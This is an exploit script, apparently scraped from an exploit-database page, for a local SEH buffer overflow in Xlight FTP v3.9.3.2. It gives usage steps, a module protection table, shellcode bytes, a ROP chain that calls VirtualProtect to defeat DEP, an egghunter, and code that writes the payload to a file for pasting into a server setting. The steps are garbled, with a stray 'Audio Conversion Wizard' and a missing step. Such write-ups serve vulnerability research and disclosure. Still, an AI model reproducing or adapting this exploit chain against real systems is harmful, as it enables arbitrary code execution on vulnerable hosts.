# Exploit Title: Xlight FTP v3.9.3.2 – Buffer Overflow (SEH Egghunter + ROP)
\n# Exploit Author: Hejap Zairy
\n# Date: 13.07.2022
\n# Software Link: http:\/\/www.xlightftpd.com\/download\/setup.exe
\n# Tested Version: v3.9.3.2(2022-1-5)
\n# Tested on: Windows 10 64bit<\/p>\n
# 1.- Run python code : 0day-Hejap_Zairy.py
\n# 2.- Open 0day_Hejap.txt and copy All content to Clipboard
\n# 3.- Open Audio Conversion Wizard and press Enter Code
\n# 5.- Click ‘Server ip ‘ -> ‘General’ -> ‘Advanced’ -> ‘Excute a program after user logged in ‘ -> ‘Setup’
\n# 6.- Crashed<\/p>\n
# Author Code By Hejap Zairy
\n#!\/usr\/bin\/env python
\n# Auther Hejap Zairy
\n#!\/usr\/bin\/env python
\nimport struct<\/p>\n
##================================================================================
\n## 2022-03-12 16:54:06
\n##================================================================================
\n##—————————————————————————————————————————————–
\n## Module info :
\n##—————————————————————————————————————————————–
\n## Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
\n##—————————————————————————————————————————————–
\n## 0x76aa0000 | 0x76ae4000 | 0x00044000 | True | True | True | False | True | 10.0.17763.1 [SHLWAPI.dll] (C:\\Windows\\System32\\SHLWAPI.dll)
\n## 0x76970000 | 0x76a93000 | 0x00123000 | True | True | True | False | True | 10.0.17763.1490 [ucrtbase.dll] (C:\\Windows\\System32\\ucrtbase.dll)
\n## 0x766a0000 | 0x766bc000 | 0x0001c000 | True | True | True | False | True | 10.0.17763.1075 [profapi.dll] (C:\\Windows\\System32\\profapi.dll)
\n## 0x76340000 | 0x763c0000 | 0x00080000 | True | True | True | False | True | 10.0.17763.1 [msvcp_win.dll] (C:\\Windows\\System32\\msvcp_win.dll)
\n## 0x75680000 | 0x757ea000 | 0x0016a000 | True | True | True | False | True | 10.0.17763.1879 [gdi32full.dll] (C:\\Windows\\System32\\gdi32full.dll)
\n## 0x75a60000 | 0x75bfe000 | 0x0019e000 | True | True | True | False | True | 10.0.17763.1 [CRYPT32.dll] (C:\\Windows\\System32\\CRYPT32.dll)
\n## 0x74ff0000 | 0x74fff000 | 0x0000f000 | True | True | True | False | True | 10.0.17763.1 [kernel.appcore.dll] (C:\\Windows\\System32\\kernel.appcore.dll)
\n## 0x00400000 | 0x006d5000 | 0x002d5000 | False | False | False | False | False | 3.9.3.2 [xlight.exe] (C:\\Users\\Tarnished\\Desktop\\Xlight\\xlight.exe)
\n## 0x74870000 | 0x74909000 | 0x00099000 | True | True | True | False | True | 10.0.17763.1075 [ODBC32.dll] (C:\\Windows\\SYSTEM32\\ODBC32.dll)
\n## 0x74b20000 | 0x74bbc000 | 0x0009c000 | True | True | True | False | True | 10.0.17763.1 [apphelp.dll] (C:\\Windows\\SYSTEM32\\apphelp.dll)
\n## 0x76280000 | 0x76297000 | 0x00017000 | True | True | True | False | True | 10.0.17763.1 [win32u.dll] (C:\\Windows\\System32\\win32u.dll)
\n## 0x75c50000 | 0x761a6000 | 0x00556000 | True | True | True | False | True | 10.0.17763.1911 [SHELL32.dll] (C:\\Windows\\System32\\SHELL32.dll)<\/p>\n
##0x006d4270 : kernel32.loadlibrarya | 0x76ce2280 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\\Users\\Tarnished\\Desktop\\Xlight\\xlight.exe)
\n##0x006d4258 : comdlg32.getopenfilenamea | 0x77226240 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\\Users\\Tarnished\\Desktop\\Xlight\\xlight.exe)
\n##0x006d427c : kernel32.virtualprotect | 0x76ce0c10 | startnull,asciiprint,ascii {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\\Users\\Tarnished\\Desktop\\Xlight\\xlight.exe)
\n##0x006d4278 : kernel32.getprocaddress | 0x76ce05a0 | startnull,asciiprint,ascii,alphanum {PAGE_READWRITE} [xlight.exe] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v3.9.3.2 (C:\\Users\\Tarnished\\Desktop\\Xlight\\xlight.exe)
\n# RopFunc syscall null
\nbadchars = [0x00,0x0a,0x0d,0x3a,0xff]\n
buf = b””
\nbuf += b”\\xd9\\xeb\\x9b\\xd9\\x74\\x24\\xf4\\x31\\xd2\\xb2\\x77\\x31\\xc9″
\nbuf += b”\\x64\\x8b\\x71\\x30\\x8b\\x76\\x0c\\x8b\\x76\\x1c\\x8b\\x46\\x08″
\nbuf += b”\\x8b\\x7e\\x20\\x8b\\x36\\x38\\x4f\\x18\\x75\\xf3\\x59\\x01\\xd1″
\nbuf += b”\\xff\\xe1\\x60\\x8b\\x6c\\x24\\x24\\x8b\\x45\\x3c\\x8b\\x54\\x28″
\nbuf += b”\\x78\\x01\\xea\\x8b\\x4a\\x18\\x8b\\x5a\\x20\\x01\\xeb\\xe3\\x34″
\nbuf += b”\\x49\\x8b\\x34\\x8b\\x01\\xee\\x31\\xff\\x31\\xc0\\xfc\\xac\\x84″
\nbuf += b”\\xc0\\x74\\x07\\xc1\\xcf\\x0d\\x01\\xc7\\xeb\\xf4\\x3b\\x7c\\x24″
\nbuf += b”\\x28\\x75\\xe1\\x8b\\x5a\\x24\\x01\\xeb\\x66\\x8b\\x0c\\x4b\\x8b”
\nbuf += b”\\x5a\\x1c\\x01\\xeb\\x8b\\x04\\x8b\\x01\\xe8\\x89\\x44\\x24\\x1c”
\nbuf += b”\\x61\\xc3\\xb2\\x08\\x29\\xd4\\x89\\xe5\\x89\\xc2\\x68\\x8e\\x4e”
\nbuf += b”\\x0e\\xec\\x52\\xe8\\x9f\\xff\\xff\\xff\\x89\\x45\\x04\\xbb\\xef”
\nbuf += b”\\xce\\xe0\\x60\\x87\\x1c\\x24\\x52\\xe8\\x8e\\xff\\xff\\xff\\x89″
\nbuf += b”\\x45\\x08\\x68\\x6c\\x6c\\x20\\x41\\x68\\x33\\x32\\x2e\\x64\\x68″
\nbuf += b”\\x75\\x73\\x65\\x72\\x30\\xdb\\x88\\x5c\\x24\\x0a\\x89\\xe6\\x56″
\nbuf += b”\\xff\\x55\\x04\\x89\\xc2\\x50\\xbb\\xa8\\xa2\\x4d\\xbc\\x87\\x1c”
\nbuf += b”\\x24\\x52\\xe8\\x5f\\xff\\xff\\xff\\x68\\x6f\\x78\\x58\\x20\\x68″
\nbuf += b”\\x61\\x67\\x65\\x42\\x68\\x4d\\x65\\x73\\x73\\x31\\xdb\\x88\\x5c”
\nbuf += b”\\x24\\x0a\\x89\\xe3\\x68\\x58\\x20\\x20\\x20\\x68\\x61\\x69\\x72″
\nbuf += b”\\x79\\x68\\x61\\x70\\x20\\x5a\\x68\\x20\\x48\\x65\\x6a\\x68\\x30″
\nbuf += b”\\x64\\x61\\x79\\x31\\xc9\\x88\\x4c\\x24\\x10\\x89\\xe1\\x31\\xd2″
\nbuf += b”\\x52\\x53\\x51\\x52\\xff\\xd0\\x31\\xc0\\x50\\xff\\x55\\x08″<\/p>\n
def Hejap_rop_chain():<\/p>\n
Hejap_gadgets = [
\n0x75c4f468, # POP EBX # RETN [windows.storage.dll] ** REBASED ** ASLR
\n0x7731c2a0, # ptr to &VirtualProtect() [IAT CRYPT32.dll] ** REBASED ** ASLR
\n0x75deb176, # MOV ESI,DWORD PTR DS:[EBX] # RETN [windows.storage.dll] ** REBASED ** ASLR
\n#[—INFO:gadgets_to_set_ebp:—]\n0x7545eebb, # POP EBP # RETN [SHLWAPI.dll] ** REBASED ** ASLR
\n0x75ff2bdb, # & call esp [msvcp_win.dll] ** REBASED ** ASLR
\n#[—INFO:gadgets_to_set_ebx:—]\n0x755d53b2, # POP EAX # RETN [KERNELBASE.dll] ** REBASED ** ASLR
\n0xfffffdff, # Value to negate, will become 0x00000201
\n0x74d241d7, # NEG EAX # RETN [USER32.dll] ** REBASED ** ASLR
\n0x75e72ff1, # XCHG EAX,EBX # RETN [windows.storage.dll] ** REBASED ** ASLR
\n#[—INFO:gadgets_to_set_edx:—]\n0x765a2dad, # POP EAX # RETN [bcryptPrimitives.dll] ** REBASED ** ASLR
\n0xffffffc0, # Value to negate, will become 0x00000040
\n0x75297b65, # NEG EAX # RETN [gdi32full.dll] ** REBASED ** ASLR
\n0x76a3b05a, # XCHG EAX,EDX # RETN [SHELL32.dll] ** REBASED ** ASLR
\n#[—INFO:gadgets_to_set_ecx:—]\n0x72bb29ef, # POP ECX # RETN [UXTHEME.DLL] ** REBASED ** ASLR
\n0x7774f16b, # &Writable location [ntdll.dll] ** REBASED ** ASLR
\n#[—INFO:gadgets_to_set_edi:—]\n0x77275d3d, # POP EDI # RETN [CRYPT32.dll] ** REBASED ** ASLR
\n0x75849686, # RETN (ROP NOP) [KERNEL32.DLL] ** REBASED ** ASLR
\n#[—INFO:gadgets_to_set_eax:—]\n0x72bf2465, # POP EAX # RETN [UXTHEME.DLL] ** REBASED ** ASLR
\n0x90909090, # nop
\n#[—INFO:pushad:—]\n0x76a37959, # PUSHAD # RETN [SHELL32.dll] ** REBASED ** ASLR
\n]\nreturn ”.join(struct.pack(‘<I’, _) for _ in Hejap_gadgets)<\/p>\n
egg = “\\x66\\x81\\xca\\xff\\x0f\\x42\\x52\\x6a\\x02\\x58\\xcd\\x2e\\x3c\\x05\\x5a\\x74″
\negg+=”\\xef\\xb8\\x68\\x30\\x30\\x70\\x8b\\xfa\\xaf\\x75\\xea\\xaf\\x75\\xe7\\xff\\xe7”
\nrop_chain = Hejap_rop_chain()
\noffset = 452
\nnseh = “\\x90” * 4
\njunk = “A” * (offset – len(nseh))
\nstackpivot = struct.pack(‘<I’, 0x8e648b26 ) # POP ESP # POP EBP # RETN ** [xlight.exe
\n#seh = struct.pack(‘<I’, 0x0019ccb8 ) null<\/p>\n
buffer = junk + nseh + stackpivot + rop_chain + “\\x90” * 5 + egg + ‘h00ph00p’ + buf + “\\x90” * (1000 – len(egg)-len(stackpivot))
\nf = open(“0day_hejap.txt”, “w”)
\nf.write(buffer)
\nf.close()<\/p>\n
# Proof and Exploit:<\/p>\n